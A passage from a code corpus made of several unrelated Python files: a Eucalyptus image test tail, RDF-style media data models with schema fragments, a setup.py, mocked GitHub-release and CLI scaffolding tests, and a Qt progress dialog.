            self.status("Run new PV image PASSED")
        finally:
            self.emi.update()
            self.debug('Image states after run attempt:')
            self.show_images()

    def clean_method(self):
        """
        Description:
        Attempts to clean up resources/artifacts created during this test.
        This method will not clean up the images created in this
        test. Will attempt to delete/terminate instances, keypairs, etc..
        """
        tester = self.tester
        assert isinstance(tester, Eucaops)
        # Images are only deregistered when --remove_created_images was given.
        tester.cleanup_artifacts(images=self.args.remove_created_images)
if __name__ == "__main__":
testcase = Load_Pv_Image()
# Create a single testcase to wrap and run the image creation tasks.
test1 = testcase.create_testunit_from_method(testcase.do_kernel_image)
test2 = testcase.create_testunit_from_method(testcase.do_ramdisk_image)
test3 = testcase.create_testunit_from_method(testcase.do_image)
test4 = testcase.create_testunit_from_method(testcase.make_image_public)
test5 = testcase.create_testunit_from_method(testcase.run_new_pv_image)
testlist = [test1, test2, test3, test4, test5]
result = testcase.run_test_case_list(testlist,
eof=True, clean_on_exit=True,
printresults=True)
if result:
testcase.errormsg('TEST FAILED WITH RESULT:{0}'.format(result))
else:
testcase.status('TEST PASSED')
exit(result)
| StarcoderdataPython |
1925561 | {'type': 'string'}
{'type': 'string'}
{'type': 'string'}
{'type': 'string'}
{'type': 'number', 'format': 'int'}
{'type': 'string', 'description': 'The id used by the provider'}
{'type': 'string', 'format': 'url'}
{'type': 'string', 'format': 'url'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
{'$ref': '#/definitions/Popularity'}
{'type': 'number', 'format': 'int'}
{'type': 'number', 'format': 'int'}
{'type': 'number', 'format': 'int'}
{'type': 'number', 'format': 'int'}
['http://xmlns.com/foaf/spec/#', 'term_nick', 'foaf']
{'type': 'string', 'description': '[http://xmlns.com/foaf/spec/#,term_nick,foaf] The username'}
{'type': 'string', 'description': 'The sha256 of the password'}
['http://xmlns.com/foaf/spec/#', 'term_mbox', 'foaf']
{'type': 'string', 'description': '[http://xmlns.com/foaf/spec/#,term_mbox,foaf] Email addres'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
{'type': 'string', 'format': 'url'}
{'type': 'string', 'description': 'The name of the quality i.e High, Low, Poor'}
{'type': 'integer', 'description': 'An unique identifier'}
['http://purl.org/dc/terms/', 'accrualPeriodicity', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/terms/,accrualPeriodicity,dc]The base url for the provider'}
{'type': 'string'}
{'type': 'string'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
{'type': 'string'}
{'type': 'number', 'format': 'float', 'description': 'In seconds'}
{'type': 'string', 'format': 'date'}
{'type': 'string', 'format': 'date'}
{'type': 'boolean'}
{'type': 'string', 'description': "If the provider does not use id's for categories use category name"}
['http://purl.org/dc/terms/', 'creator', 'dc']
{'$ref': '#/definitions/Author', 'description': '[http://purl.org/dc/terms/,creator,dc] The creator of the content'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
{'type': 'array', 'items': {'type': 'string'}}
{'type': 'array', 'items': {'$ref': '#/definitions/AudioUrl'}}
{'type': 'integer', 'description': 'An unique identifier'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
['http://purl.org/dc/terms/', 'creator', 'dc']
{'$ref': '#/definitions/Author', 'description': '[http://purl.org/dc/terms/,creator,dc] The creator of the content'}
['http://purl.org/dc/elements/1.1/', 'title', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,title,dc]'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
['http://purl.org/dc/elements/1.1/', 'description', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,description,dc]'}
{'type': 'string'}
{'type': 'string'}
['http://purl.org/dc/elements/1.1/', 'created', 'dc']
{'type': 'string', 'format': 'date', 'description': '[http://purl.org/dc/elements/1.1/,created,dc]'}
{'type': 'integer', 'description': 'An unique identifier'}
{'type': 'string', 'description': 'The ID for the image'}
['http://purl.org/dc/elements/1.1/', 'title', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,title,dc]'}
['http://purl.org/media#', 'duration', 'media']
{'type': 'array', 'description': '[http://purl.org/media#,duration,media]The categories for this image'}
['http://purl.org/dc/elements/1.1/', 'description', 'dc']
{'type': 'string', 'description': '[http://purl.org/dc/elements/1.1/,description,dc]'}
['http://purl.org/dc/terms/', 'creator', 'dc']
{'$ref': '#/definitions/Author', 'description': '[http://purl.org/dc/terms/,creator,dc] The creator of the content'}
['http://purl.org/dc/elements/1.1/', 'created', 'dc']
{'type': 'integer', 'description': '[http://purl.org/dc/elements/1.1/,created,dc] Time inserted into the gallery, epoch time'}
{'type': 'string', 'description': 'Image MIME type.'}
{'type': 'boolean', 'description': 'is the image animated'}
{'type': 'integer', 'description': 'The width of the image in pixels'}
{'type': 'integer', 'description': 'The height of the image in pixels'}
{'type': 'integer', 'description': 'The size of the image in bytes'}
{'type': 'integer', 'description': 'The number of image views'}
{'type': 'string', 'description': 'The direct link to the the image. (Note: if fetching an animated GIF that was over 20MB in original size, a .gif thumbnail will be returned)'}
{'type': 'string', 'description': "The .gifv link. Only available if the image is animated and type is 'image/gif'."}
{'type': 'string', 'description': "The direct link to the .mp4. Only available if the image is animated and type is 'image/gif'."}
{'type': 'integer', 'description': 'The Content-Length of the .mp4. Only available if the image is animated and type is image/gif. Note that a zero value (0) is possible if the video has not yet been generated'}
{'type': 'string', 'description': "The current user's vote on the album. null if not signed in or if the user hasn't voted on it."}
{'type': 'boolean', 'description': 'Indicates if the image has been marked as nsfw or not. Defaults to null if information is not available.'}
{'type': 'string', 'description': 'Topic of the gallery image.'}
{'type': 'integer', 'description': 'Topic ID of the gallery image.'}
{'type': 'string', 'description': 'If the image has been categorized by our backend then this will contain the section the image belongs in. (funny, cats, adviceanimals, wtf, etc)'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
{'$ref': '#/definitions/Popularity'}
import rest_service.model.base_model as base_model
from rest_service.model.base_model import Model
# Local alias for the module-level insert helper so callers of this module
# can use it without going through base_model.
create_insert = base_model.create_insert
class Popularity(Model):
    """Model describing vote/view/comment popularity counters for an item."""

    def __init__(self, URI):
        self.URI = URI
        # Vocabulary prefix shared by every property of this model.
        rr = 'http://razvanrotari.me/terms/'
        self.data = {
            'class_name': {'link': [rr, 'className', 'rr'],
                           'value': 'Popularity'},
            'comment_count': {'link': [rr, 'comment_count', 'rr'],
                              'ref': None, 'type': 'int', 'value': None},
            'down_votes': {'link': [rr, 'down_votes', 'rr'],
                           'ref': None, 'type': 'int', 'value': None},
            'up_votes': {'link': [rr, 'up_votes', 'rr'],
                         'ref': None, 'type': 'int', 'value': None},
            'views': {'link': [rr, 'views', 'rr'],
                      'ref': None, 'type': 'int', 'value': None},
        }
base_model.Popularity = Popularity
class Author(Model):
    """Model describing a content author: profile details plus popularity."""

    def __init__(self, URI):
        self.URI = URI
        # Vocabulary prefixes used by this model's properties.
        rr = 'http://razvanrotari.me/terms/'
        dc = 'http://purl.org/dc/elements/1.1/'
        self.data = {
            'class_name': {'link': [rr, 'className', 'rr'],
                           'value': 'Author'},
            'description': {'link': [rr, 'description', 'rr'],
                            'ref': None, 'type': 'str', 'value': None},
            'external_id': {'link': [rr, 'external_id', 'rr'],
                            'ref': None, 'type': 'str', 'value': None},
            'followers': {'link': [rr, 'followers', 'rr'],
                          'ref': None, 'type': 'int', 'value': None},
            'location': {'link': [rr, 'location', 'rr'],
                         'ref': None, 'type': 'str', 'value': None},
            'name': {'link': [rr, 'name', 'rr'],
                     'ref': None, 'type': 'str', 'value': None},
            # Nested model: resolved through the 'Popularity' class.
            'popularity': {'link': [rr, 'popularity', 'rr'],
                           'ref': 'Popularity', 'type': 'Popularity', 'value': None},
            'profile_image_url': {'link': [rr, 'profile_image_url', 'rr'],
                                  'ref': None, 'type': 'str', 'value': None},
            'profile_url': {'link': [rr, 'profile_url', 'rr'],
                            'ref': None, 'type': 'str', 'value': None},
            'provenance': {'link': [dc, 'publisher', 'dc'],
                           'ref': None, 'type': 'str', 'value': None},
            'real_name': {'link': [rr, 'real_name', 'rr'],
                          'ref': None, 'type': 'str', 'value': None},
        }
base_model.Author = Author
class User(Model):
    """Model describing an application user account."""

    def __init__(self, URI):
        self.URI = URI
        # Vocabulary prefixes used by this model's properties.
        rr = 'http://razvanrotari.me/terms/'
        foaf = 'http://xmlns.com/foaf/spec/#'
        media = 'http://purl.org/media#'
        self.data = {
            'categories': {'link': [media, 'duration', 'media'],
                           'ref': None, 'type': 'str', 'value': None},
            'class_name': {'link': [rr, 'className', 'rr'],
                           'value': 'User'},
            'email': {'link': [foaf, 'term_mbox', 'foaf'],
                      'ref': None, 'type': 'str', 'value': None},
            'name': {'link': [foaf, 'term_nick', 'foaf'],
                     'ref': None, 'type': 'str', 'value': None},
            'password': {'link': [rr, 'password', 'rr'],
                         'ref': None, 'type': 'str', 'value': None},
        }
base_model.User = User
class AudioUrl(Model):
    """Model describing a single named audio stream URL."""

    def __init__(self, URI):
        self.URI = URI
        # Vocabulary prefix shared by every property of this model.
        rr = 'http://razvanrotari.me/terms/'
        self.data = {
            'class_name': {'link': [rr, 'className', 'rr'],
                           'value': 'AudioUrl'},
            'name': {'link': [rr, 'name', 'rr'],
                     'ref': None, 'type': 'str', 'value': None},
            'url': {'link': [rr, 'url', 'rr'],
                    'ref': None, 'type': 'str', 'value': None},
        }
base_model.AudioUrl = AudioUrl
class AudioItem(Model):
    """Model describing an audio item (e.g. a podcast/track) and its metadata."""

    def __init__(self, URI):
        self.URI = URI
        # Vocabulary prefixes used by this model's properties.
        rr = 'http://razvanrotari.me/terms/'
        dc = 'http://purl.org/dc/elements/1.1/'
        dcterms = 'http://purl.org/dc/terms/'
        media = 'http://purl.org/media#'
        self.data = {
            'audio_links': {'link': [rr, 'audio_links', 'rr'],
                            'ref': None, 'type': 'str', 'value': None},
            # Nested model: resolved through the 'Author' class.
            'author': {'link': [dcterms, 'creator', 'dc'],
                       'ref': 'Author', 'type': 'Author', 'value': None},
            'categories': {'link': [media, 'duration', 'media'],
                           'ref': None, 'type': 'str', 'value': None},
            'class_name': {'link': [rr, 'className', 'rr'],
                           'value': 'AudioItem'},
            'description': {'link': [rr, 'description', 'rr'],
                            'ref': None, 'type': 'str', 'value': None},
            'duration': {'link': [rr, 'duration', 'rr'],
                         'ref': None, 'type': 'float', 'value': None},
            'external_category_id': {'link': [rr, 'external_category_id', 'rr'],
                                     'ref': None, 'type': 'str', 'value': None},
            'external_id': {'link': [rr, 'external_id', 'rr'],
                            'ref': None, 'type': 'str', 'value': None},
            'id': {'link': [rr, 'id', 'rr'],
                   'ref': None, 'type': 'str', 'value': None},
            'provenance': {'link': [dc, 'publisher', 'dc'],
                           'ref': None, 'type': 'str', 'value': None},
            'provider': {'link': [dcterms, 'accrualPeriodicity', 'dc'],
                         'ref': None, 'type': 'str', 'value': None},
            'recorded_at': {'link': [rr, 'recorded_at', 'rr'],
                            'ref': None, 'type': 'datetime', 'value': None},
            'supports_comments': {'link': [rr, 'supports_comments', 'rr'],
                                  'ref': None, 'type': 'bool', 'value': None},
            'tags': {'link': [rr, 'tags', 'rr'],
                     'ref': None, 'type': 'str', 'value': None},
            'title': {'link': [rr, 'title', 'rr'],
                      'ref': None, 'type': 'str', 'value': None},
            'uploaded_at': {'link': [rr, 'uploaded_at', 'rr'],
                            'ref': None, 'type': 'datetime', 'value': None},
        }
base_model.AudioItem = AudioItem
class NewsItem(Model):
    """Model describing a news article and its metadata."""

    def __init__(self, URI):
        self.URI = URI
        # Vocabulary prefixes used by this model's properties.
        rr = 'http://razvanrotari.me/terms/'
        dc = 'http://purl.org/dc/elements/1.1/'
        dcterms = 'http://purl.org/dc/terms/'
        media = 'http://purl.org/media#'
        self.data = {
            # Nested model: resolved through the 'Author' class.
            'author': {'link': [dcterms, 'creator', 'dc'],
                       'ref': 'Author', 'type': 'Author', 'value': None},
            'categories': {'link': [media, 'duration', 'media'],
                           'ref': None, 'type': 'str', 'value': None},
            'class_name': {'link': [rr, 'className', 'rr'],
                           'value': 'NewsItem'},
            'description': {'link': [dc, 'description', 'dc'],
                            'ref': None, 'type': 'str', 'value': None},
            'id': {'link': [rr, 'id', 'rr'],
                   'ref': None, 'type': 'str', 'value': None},
            'image_url': {'link': [rr, 'image_url', 'rr'],
                          'ref': None, 'type': 'str', 'value': None},
            'provenance': {'link': [dc, 'publisher', 'dc'],
                           'ref': None, 'type': 'str', 'value': None},
            'timestamp': {'link': [dc, 'created', 'dc'],
                          'ref': None, 'type': 'datetime', 'value': None},
            'title': {'link': [dc, 'title', 'dc'],
                      'ref': None, 'type': 'str', 'value': None},
            'url': {'link': [rr, 'url', 'rr'],
                    'ref': None, 'type': 'str', 'value': None},
        }
base_model.NewsItem = NewsItem
class ImageItem(Model):
    """Model describing an image/GIF item and its metadata."""

    def __init__(self, URI):
        self.URI = URI
        # Vocabulary prefixes used by this model's properties.
        rr = 'http://razvanrotari.me/terms/'
        dc = 'http://purl.org/dc/elements/1.1/'
        dcterms = 'http://purl.org/dc/terms/'
        media = 'http://purl.org/media#'

        def rr_field(term, kind='str'):
            # Helper for the common "simple property in the rr vocabulary"
            # case; builds a fresh descriptor dict per call.
            return {'link': [rr, term, 'rr'],
                    'ref': None, 'type': kind, 'value': None}

        self.data = {
            'animated': rr_field('animated', 'bool'),
            # Nested model: resolved through the 'Author' class.
            'author': {'link': [dcterms, 'creator', 'dc'],
                       'ref': 'Author', 'type': 'Author', 'value': None},
            'categories': {'link': [media, 'duration', 'media'],
                           'ref': None, 'type': 'str', 'value': None},
            'class_name': {'link': [rr, 'className', 'rr'],
                           'value': 'ImageItem'},
            'description': {'link': [dc, 'description', 'dc'],
                            'ref': None, 'type': 'str', 'value': None},
            'external_id': rr_field('external_id'),
            'external_topic_id': rr_field('external_topic_id'),
            'gifv': rr_field('gifv'),
            'height': rr_field('height'),
            'id': rr_field('id'),
            'link': rr_field('link'),
            'mime_type': rr_field('mime_type'),
            'mp4': rr_field('mp4'),
            'mp4_size': rr_field('mp4_size'),
            'nsfw': rr_field('nsfw', 'bool'),
            # Nested model: resolved through the 'Popularity' class.
            'popularity': {'link': [rr, 'popularity', 'rr'],
                           'ref': 'Popularity', 'type': 'Popularity', 'value': None},
            'provenance': {'link': [dc, 'publisher', 'dc'],
                           'ref': None, 'type': 'str', 'value': None},
            'section': rr_field('section'),
            'size': rr_field('size'),
            # NOTE: 'timestamp' is typed 'str' here (unlike NewsItem's
            # 'datetime'); kept as-is to preserve behaviour.
            'timestamp': {'link': [dc, 'created', 'dc'],
                          'ref': None, 'type': 'str', 'value': None},
            'title': {'link': [dc, 'title', 'dc'],
                      'ref': None, 'type': 'str', 'value': None},
            'topic': rr_field('topic'),
            'views': rr_field('views'),
            'vote': rr_field('vote'),
            'width': rr_field('width'),
        }
base_model.ImageItem = ImageItem
| StarcoderdataPython |
306685 | <filename>setup.py
# pylint: disable=missing-docstring
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from setuptools import setup, find_packages
# Runtime dependencies; most are pinned to exact versions for
# reproducible installs.
INSTALL_REQUIRES = [
    'awacs==0.5.4',
    'boto3==1.3.1',
    'click==6.6',
    'connexion==1.0.103',
    'fauxfactory==2.0.9',
    'Flask-HTTPAuth',
    'troposphere==1.6.0',
    'pyopenssl',
    'cffi==1.7.0'
]

setup(
    name='demiurge',
    version='0.8.3',
    packages=find_packages(),
    install_requires=INSTALL_REQUIRES,
    author='<NAME>',
    author_email='<EMAIL>',
    license='Apache License, Version 2.0',
    entry_points={
        # Installs the `demiurge` console command, wired to the click CLI.
        'console_scripts': [
            'demiurge = demiurge.cli:cli',
        ],
    },
)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 colorcolumn=100
| StarcoderdataPython |
9608223 | <filename>gslab_scons/tests/test_release_tools.py
import unittest
import sys
import os
import mock
# Import module containing gslab_scons testing side effects
import gslab_scons.tests._side_effects as fx
# Ensure that Python can find and load the GSLab libraries
os.chdir(os.path.dirname(os.path.realpath(__file__)))
sys.path.append('../..')
import gslab_scons
import gslab_scons._release_tools as tools
from gslab_scons._exception_classes import ReleaseError
from gslab_make.tests import nostderrout
class TestReleaseTools(unittest.TestCase):
    """Unit tests for gslab_scons._release_tools.

    All external interactions (HTTP requests, subprocess calls, and file
    access) are mocked out, so only the release helpers' own logic is
    exercised.  Note that mock.patch decorators are applied bottom-up:
    the lowest decorator corresponds to the first mock argument.
    """

    @mock.patch('gslab_scons._release_tools.requests.session')
    @mock.patch('gslab_scons._release_tools.open')
    @mock.patch('gslab_scons._release_tools.os.path.isfile')
    def test_upload_asset_standard(self, mock_isfile, mock_open, mock_session):
        '''
        Test that upload_asset() correctly prepares a request
        to upload a release asset to GitHub.
        '''
        # Allow upload_asset() to work without an actual release asset file
        mock_isfile.return_value = True
        mock_open.return_value = 'file_object'
        # There are three connected requests-related mocks at play here:
        # i) mock_session: the requests.session() function
        # ii) the session object returned by requests.session
        # iii) the mocked post() method of the mocked session object
        mock_session.return_value = mock.MagicMock(post = mock.MagicMock())
        # NOTE(review): the token literal below looks redacted; the
        # Authorization assertion further down expects 'token test_token' --
        # confirm the intended fixture value.
        tools.upload_asset(github_token = '<PASSWORD>',
                           org = 'gslab-econ',
                           repo = 'gslab_python',
                           release_id = 'test_release',
                           file_name = 'release.txt',
                           content_type = 'text/markdown')
        # Check that upload_asset called a session object's post() method
        # once and with the correct arguments.
        mock_session.return_value.post.assert_called_once()
        keyword_args = mock_session.return_value.post.call_args[1]
        positional_args = mock_session.return_value.post.call_args[0]
        self.assertEqual(keyword_args['files']['file'], 'file_object')
        self.assertEqual(keyword_args['headers']['Authorization'], 'token test_token')
        self.assertEqual(keyword_args['headers']['Content-Type'], 'text/markdown')
        # Check that the first positional argument matches the desired upload path
        desired_upload_path = ''.join(['https://uploads.github.com/repos/',
                                       'gslab-econ/gslab_python/releases/',
                                       'test_release/assets?name=release.txt'])
        self.assertEqual(positional_args[0], desired_upload_path)

    @mock.patch('gslab_scons._release_tools.requests.session')
    def test_upload_asset_bad_file(self, mock_session):
        '''
        Test that upload_asset() raises an error when its file_name
        argument isn't valid.
        '''
        mock_session.return_value = mock.MagicMock(post = mock.MagicMock())
        with self.assertRaises(ReleaseError), nostderrout():
            tools.upload_asset(github_token = '<PASSWORD>',
                               org = 'gslab-econ',
                               repo = 'gslab_python',
                               release_id = 'test_release',
                               file_name = 'nonexistent_file',
                               content_type = 'text/markdown')

    @mock.patch('gslab_scons._release_tools.subprocess.call')
    def test_up_to_date(self, mock_call):
        '''
        Test that up_to_date() correctly recognises
        an SCons directory as up-to-date or out of date.
        '''
        # The mode argument needs to be one of the valid options
        with self.assertRaises(ReleaseError), nostderrout():
            gslab_scons._release_tools.up_to_date(mode = 'invalid')
        # The mock of subprocess call should write pre-specified text
        # to stdout. This mock prevents us from having to set up real
        # SCons and git directories.
        mock_call.side_effect = \
            fx.make_call_side_effect('Your branch is up-to-date')
        self.assertTrue(gslab_scons._release_tools.up_to_date(mode = 'git'))
        mock_call.side_effect = \
            fx.make_call_side_effect('modified: .sconsign.dblite')
        self.assertFalse(gslab_scons._release_tools.up_to_date(mode = 'git'))
        mock_call.side_effect = \
            fx.make_call_side_effect("scons: `.' is up to date.")
        self.assertTrue(gslab_scons._release_tools.up_to_date(mode = 'scons'))
        mock_call.side_effect = \
            fx.make_call_side_effect('python some_script.py')
        self.assertFalse(gslab_scons._release_tools.up_to_date(mode = 'scons'))
        # The up_to_date() function shouldn't work in SCons or git mode
        # when it is called outside of a SCons directory or a git
        # repository, respectively.
        mock_call.side_effect = \
            fx.make_call_side_effect("Not a git repository")
        with self.assertRaises(ReleaseError), nostderrout():
            gslab_scons._release_tools.up_to_date(mode = 'git')
        mock_call.side_effect = \
            fx.make_call_side_effect("No SConstruct file found")
        with self.assertRaises(ReleaseError), nostderrout():
            gslab_scons._release_tools.up_to_date(mode = 'scons')

    @mock.patch('gslab_scons._release_tools.open')
    def test_extract_dot_git(self, mock_open):
        '''
        Test that extract_dot_git() correctly extracts repository
        information from a .git folder's config file.
        '''
        mock_open.side_effect = fx.dot_git_open_side_effect()
        repo_info = tools.extract_dot_git('.git')
        self.assertEqual(repo_info[0], 'repo')
        self.assertEqual(repo_info[1], 'org')
        self.assertEqual(repo_info[2], 'branch')
        # Ensure that extract_dot_git() raises an error when the directory
        # argument is not a .git folder.
        # i) The directory argument identifies an empty folder
        with self.assertRaises(ReleaseError):
            repo_info = tools.extract_dot_git('not/git')
        # ii) Mock the .git/config file so that url information is missing
        # from its "[remote "origin"]" section. (We parse organisation,
        # repo, and branch information from this url.)
        mock_open.side_effect = fx.dot_git_open_side_effect(url = False)
        with self.assertRaises(ReleaseError):
            repo_info = tools.extract_dot_git('.git')
# Allow running this test module directly (python test_release_tools.py).
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
11209617 | <reponame>roedesh/nxstart
# -*- coding: utf-8 -*-
"""Includes tests for the 'libnx' command"""
import os
from click.testing import CliRunner
from nxstart.cli import cli
from nxstart.tests.helpers import (APP_AUTHOR, APP_NAME, DATE_CREATED,
DIRECTORY_NAME, directory_exists,
file_contains_strings, file_exists,
makefile_has_project_and_author_name,
readme_has_project_and_author_name)
def test_libnx_with_clion():
    """`nxstart libnx --clion` scaffolds a libnx project including CLion files."""
    runner = CliRunner()
    with runner.isolated_filesystem():
        outcome = runner.invoke(
            cli, ["-n", APP_NAME, "-a", APP_AUTHOR, "libnx", "--clion"]
        )
        assert not outcome.exception
        assert outcome.output.endswith("Successfully created the libnx project!\n")
        for subdir in ("data", "includes"):
            assert directory_exists(os.path.join(DIRECTORY_NAME, subdir))
        # CLion support means a CMakeLists.txt is generated.
        assert file_exists("CMakeLists.txt")
        assert readme_has_project_and_author_name()
        assert makefile_has_project_and_author_name()
        assert main_cpp_has_valid_data()
def test_libnx_without_clion():
    """`nxstart libnx --no-clion` scaffolds a libnx project without CLion files."""
    runner = CliRunner()
    with runner.isolated_filesystem():
        outcome = runner.invoke(
            cli, ["-n", APP_NAME, "-a", APP_AUTHOR, "libnx", "--no-clion"]
        )
        assert not outcome.exception
        assert outcome.output.endswith("Successfully created the libnx project!\n")
        for subdir in ("data", "includes"):
            assert directory_exists(os.path.join(DIRECTORY_NAME, subdir))
        # Without CLion support no CMakeLists.txt must be generated.
        assert not file_exists("CMakeLists.txt")
        assert readme_has_project_and_author_name()
        assert makefile_has_project_and_author_name()
        assert main_cpp_has_valid_data()
def main_cpp_has_valid_data():
    """Return True when the generated main.cpp embeds app name, author and date."""
    main_cpp = os.path.join("source", "main.cpp")
    return file_contains_strings(main_cpp, [APP_NAME, APP_AUTHOR, DATE_CREATED])
| StarcoderdataPython |
11273794 | <filename>h5sh/scripts/__init__.py<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Command line entry points."""
| StarcoderdataPython |
3580217 | <gh_stars>1-10
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" A simple progress bar intended to run in the UI thread """
import time
from pyface.qt import QtGui, QtCore
from traits.api import Bool, Instance, Int, Unicode, provides
from pyface.i_progress_dialog import IProgressDialog, MProgressDialog
from .window import Window
@provides(IProgressDialog)
class ProgressDialog(MProgressDialog, Window):
    """ A simple progress dialog window which allows itself to be updated

    The dialog consists of a message label, a QProgressBar, optional
    elapsed/estimated/remaining time rows, and optional OK/Cancel
    buttons.  update() drives the bar and closes the window once the
    maximum is reached or the user cancels.
    """

    # FIXME: buttons are not set up correctly yet

    #: The progress bar widget
    progress_bar = Instance(QtGui.QProgressBar)

    #: The window title
    title = Unicode

    #: The text message to display in the dialog
    message = Unicode

    #: The minimum value of the progress range
    min = Int

    #: The maximum value of the progress range
    max = Int

    #: The margin around the progress bar
    margin = Int(5)

    #: Whether or not the progress dialog can be cancelled
    can_cancel = Bool(False)

    # The IProgressDialog interface doesn't declare this, but since this is a
    # feature of the QT backend ProgressDialog that doesn't appear in WX, we
    # offer an option to disable it.
    #: Whether or not to show an OK button (Qt-backend extension).
    can_ok = Bool(False)

    #: Whether or not to show the time taken (not implemented in Qt)
    show_time = Bool(False)

    #: Whether or not to show the percent completed
    show_percent = Bool(False)

    #: The size of the dialog
    dialog_size = Instance(QtCore.QRect)

    #: Label for the 'cancel' button
    cancel_button_label = Unicode('Cancel')

    #: Whether or not the dialog was cancelled by the user
    _user_cancelled = Bool(False)

    #: The widget showing the message text
    _message_control = Instance(QtGui.QLabel)

    #: The widget showing the time elapsed
    _elapsed_control = Instance(QtGui.QLabel)

    #: The widget showing the estimated time to completion
    _estimated_control = Instance(QtGui.QLabel)

    #: The widget showing the estimated time remaining
    _remaining_control = Instance(QtGui.QLabel)

    #-------------------------------------------------------------------------
    # IWindow Interface
    #-------------------------------------------------------------------------

    def open(self):
        """ Opens the window. """
        super(ProgressDialog, self).open()
        # Record the start time so update() can derive elapsed/estimated/
        # remaining durations.
        self._start_time = time.time()

    def close(self):
        """ Closes the window. """
        self.progress_bar.destroy()
        self.progress_bar = None

        super(ProgressDialog, self).close()

    #-------------------------------------------------------------------------
    # IProgressDialog Interface
    #-------------------------------------------------------------------------

    def update(self, value):
        """ Update the progress bar to the desired value

        If the value is >= the maximum and the progress bar is not contained
        in another panel the parent window will be closed.

        Parameters
        ----------
        value :
            The progress value to set.

        Returns
        -------
        (continue, skip) : (bool, bool)
            *continue* is False once the user has cancelled; *skip* is
            always False here.  Returns (None, None) if the dialog was
            already closed.
        """
        if self.progress_bar is None:
            return None, None

        if self.max > 0:
            self.progress_bar.setValue(value)

            if (self.max != self.min):
                percent = (float(value) - self.min)/(self.max - self.min)
            else:
                percent = 1.0

            if self.show_time and (percent != 0):
                current_time = time.time()
                elapsed = current_time - self._start_time
                # Linear extrapolation of the total duration from the
                # fraction completed so far.
                estimated = elapsed/percent
                remaining = estimated - elapsed

                self._set_time_label(elapsed, self._elapsed_control)
                self._set_time_label(estimated, self._estimated_control)
                self._set_time_label(remaining, self._remaining_control)

            if value >= self.max or self._user_cancelled:
                self.close()
        else:
            # Indeterminate range (max == 0): treat *value* as an increment.
            self.progress_bar.setValue(self.progress_bar.value() + value)

            if self._user_cancelled:
                self.close()

        QtGui.QApplication.processEvents()

        return (not self._user_cancelled, False)

    #-------------------------------------------------------------------------
    # Private Interface
    #-------------------------------------------------------------------------

    def reject(self, event):
        """ Mark the dialog as cancelled by the user and close it. """
        self._user_cancelled = True
        self.close()

    def _set_time_label(self, value, control):
        """ Format *value* (a duration in seconds) as H:MM:SS on *control*. """
        # NOTE(review): '/' is true division on Python 3, so floats reach
        # the %u conversions below (which truncate when formatting); floor
        # division (//) would make the intent explicit.
        hours = value / 3600
        minutes = (value % 3600) / 60
        seconds = value % 60
        label = "%1u:%02u:%02u" % (hours, minutes, seconds)
        control.setText(label)

    def _create_buttons(self, dialog, layout):
        """ Creates the buttons. """
        if not (self.can_cancel or self.can_ok):
            return

        # Create the button.
        buttons = QtGui.QDialogButtonBox()

        if self.can_cancel:
            buttons.addButton(self.cancel_button_label, QtGui.QDialogButtonBox.RejectRole)

        if self.can_ok:
            buttons.addButton(QtGui.QDialogButtonBox.Ok)

        # TODO: hookup the buttons to our methods, this may involve subclassing from QDialog
        if self.can_cancel:
            buttons.rejected.connect(dialog.reject)
        if self.can_ok:
            buttons.accepted.connect(dialog.accept)

        layout.addWidget(buttons)

    def _create_label(self, dialog, layout, text):
        """ Add a '<text> <value>' row to *layout*; return the value label. """
        dummy = QtGui.QLabel(text, dialog)
        dummy.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)

        label = QtGui.QLabel("unknown", dialog)
        label.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft | QtCore.Qt.AlignRight)

        sub_layout = QtGui.QHBoxLayout()

        sub_layout.addWidget(dummy)
        sub_layout.addWidget(label)

        layout.addLayout(sub_layout)

        return label

    def _create_gauge(self, dialog, layout):
        """ Create the progress bar widget and add it to *layout*. """
        self.progress_bar = QtGui.QProgressBar(dialog)
        self.progress_bar.setRange(self.min, self.max)
        layout.addWidget(self.progress_bar)

        if self.show_percent:
            self.progress_bar.setFormat("%p%")
        else:
            self.progress_bar.setFormat("%v")

    def _create_message(self, dialog, layout):
        """ Create the message label and add it to *layout*. """
        label = QtGui.QLabel(self.message, dialog)
        label.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
        layout.addWidget(label)
        self._message_control = label
        return

